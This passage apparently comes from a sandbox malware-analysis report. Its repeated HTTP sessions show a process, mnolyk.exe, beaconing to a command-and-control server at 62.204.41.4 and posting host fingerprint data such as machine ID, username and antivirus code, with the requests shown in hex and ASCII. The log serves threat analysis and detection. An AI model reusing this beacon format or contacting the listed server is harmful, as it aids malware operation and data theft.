Feb 7, 2023 20:03:46.912657022 CET	780	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
626	192.168.2.6	50351	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:47.097069025 CET	781	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:47.161994934 CET	781	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
627	192.168.2.6	50352	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:47.357137918 CET	782	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:47.420408010 CET	782	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
628	192.168.2.6	50353	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:47.599615097 CET	783	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:47.664232969 CET	783	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
629	192.168.2.6	50354	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:47.847893000 CET	784	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:47.911897898 CET	784	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.6	49783	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:06.638993979 CET	183	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:06.706861973 CET	183	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
630	192.168.2.6	50355	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:48.094654083 CET	785	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:48.159996033 CET	785	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
631	192.168.2.6	50356	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:48.331429005 CET	786	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:48.396509886 CET	786	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
632	192.168.2.6	50357	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:48.563249111 CET	786	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:48.626431942 CET	787	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
633	192.168.2.6	50358	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:48.800827980 CET	788	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:48.862360954 CET	788	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
634	192.168.2.6	50359	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:49.032955885 CET	789	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:49.098532915 CET	789	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
635	192.168.2.6	50360	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:49.278758049 CET	790	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:49.343576908 CET	790	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
636	192.168.2.6	50361	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:49.565589905 CET	790	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:49.628758907 CET	791	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
637	192.168.2.6	50362	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:49.798074961 CET	792	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:49.861625910 CET	792	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
638	192.168.2.6	50363	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:50.032689095 CET	793	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:50.096600056 CET	793	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
639	192.168.2.6	50364	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:50.279050112 CET	794	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:50.342825890 CET	794	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.6	49784	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:06.918802023 CET	184	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:06.983558893 CET	184	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
640	192.168.2.6	50365	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:50.517630100 CET	795	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:50.581003904 CET	795	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
641	192.168.2.6	50366	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:50.757392883 CET	796	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:50.822324991 CET	796	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
642	192.168.2.6	50367	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:51.006859064 CET	797	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:51.071639061 CET	797	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
643	192.168.2.6	50368	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:51.253026009 CET	798	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:51.318506002 CET	798	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
644	192.168.2.6	50369	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:51.539851904 CET	799	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:51.605659962 CET	799	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
645	192.168.2.6	50370	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
